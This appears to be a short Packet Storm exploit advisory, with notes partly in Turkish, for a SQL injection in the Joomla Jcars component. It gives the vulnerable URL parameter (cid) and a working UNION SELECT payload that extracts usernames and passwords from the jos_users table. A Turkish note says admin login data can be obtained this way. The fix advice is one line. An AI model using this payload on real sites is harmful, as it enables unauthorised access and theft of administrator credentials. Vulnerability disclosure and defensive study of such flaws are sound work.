The Joomla Jcars component suffers from a remote SQL injection vulnerability.
65c3bc4dc09d59cb0feb75ac4a731007657b09eb9a143ff1fa451bc83d47ffb6
<------------------- header data start ------------------- >
#############################################################
Joomla Component Jcars SQL Injection Vulnerability
#############################################################
# Author : Fl0riX ~ Bug Researchers
# Name : Joomla Com_jcars
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Demo Vuln :
[+]http://www.site/index.php?option=com_jcars&view=car&cid=[EXPLOIT]
# Note: Sayfa Kaynak Kodlarina Bakmayi Unutmayin :))
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
null+UNION+SELECT+1,2,3,concat(username,0x3a,password)florix,5+from+jos_users
< -- bug code end of -- >
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed